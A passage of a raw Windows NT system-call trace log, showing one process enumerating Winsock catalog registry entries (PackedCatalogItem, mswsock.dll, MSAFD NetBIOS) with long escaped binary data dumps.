\0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0E\05\05\09\0B\00\0C\01\0-\0F\0A\04\06\0-\04\06\04\0D\0-\0B\0\0\0\0\0\204\3\0\0\203\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\203\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\204\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\08\0\204\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\205\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\205\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\206\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00643   748   NtClose  (80, ... ) == 0x0
 00644   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000018"}, ... 80, ) }, ... 80, ) == 0x0
 00645   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00646   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00647   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\36\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\376\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0E\05\05\09\0B\00\0C\01\0-\0F\0A\04\06\0-\04\06\04\0D\0-\0B\0\0\0\0\0\204\3\0\0\210\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\210\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\211\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\09\0\211\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\212\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\212\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\213\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\36\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\376\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0E\05\05\09\0B\00\0C\01\0-\0F\0A\04\06\0-\04\06\04\0D\0-\0B\0\0\0\0\0\204\3\0\0\210\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\210\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\211\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\09\0\211\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\212\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\212\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\213\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\212\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\213\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\36\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\376\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0E\05\05\09\0B\00\0C\01\0-\0F\0A\04\06\0-\04\06\04\0D\0-\0B\0\0\0\0\0\204\3\0\0\210\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\210\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\211\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\09\0\211\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\212\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\212\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\213\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00648   748   NtClose  (80, ... ) == 0x0
 00649   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000019"}, ... 80, ) }, ... 80, ) == 0x0
 00650   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00651   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00652   748   NtAllocateVirtualMemory  (-1, 1359872, 0, 4096, 4096, 4, ... 1359872, 4096, ) == 0x0
 00653   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\37\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\372\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0C\0D\03\0C\06\04\0B\08\0-\0D\0B\07\06\0-\04\04\0C\08\0-\09\0\0\0\0\0\204\3\0\0\216\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\216\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\217\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\00\0\217\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\220\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\220\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\221\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\37\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\372\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0C\0D\03\0C\06\04\0B\08\0-\0D\0B\07\06\0-\04\04\0C\08\0-\09\0\0\0\0\0\204\3\0\0\216\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\216\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\217\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\00\0\217\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\220\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\220\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\221\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\220\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\221\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\37\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\372\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0C\0D\03\0C\06\04\0B\08\0-\0D\0B\07\06\0-\04\04\0C\08\0-\09\0\0\0\0\0\204\3\0\0\216\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\216\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\217\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\00\0\217\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\220\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\220\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\221\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00654   748   NtClose  (80, ... ) == 0x0
 00655   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000020"}, ... 80, ) }, ... 80, ) == 0x0
 00656   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00657   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00658   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222 \4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\372\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0C\0D\03\0C\06\04\0B\08\0-\0D\0B\07\06\0-\04\04\0C\08\0-\09\0\0\0\0\0\204\3\0\0\223\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\223\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\224\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\01\0\224\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\225\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\225\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\226\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222 \4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\372\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0C\0D\03\0C\06\04\0B\08\0-\0D\0B\07\06\0-\04\04\0C\08\0-\09\0\0\0\0\0\204\3\0\0\223\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0\223\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\224\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\02\01\0\224\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0\225\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\225\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\226\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\225\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\226\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, 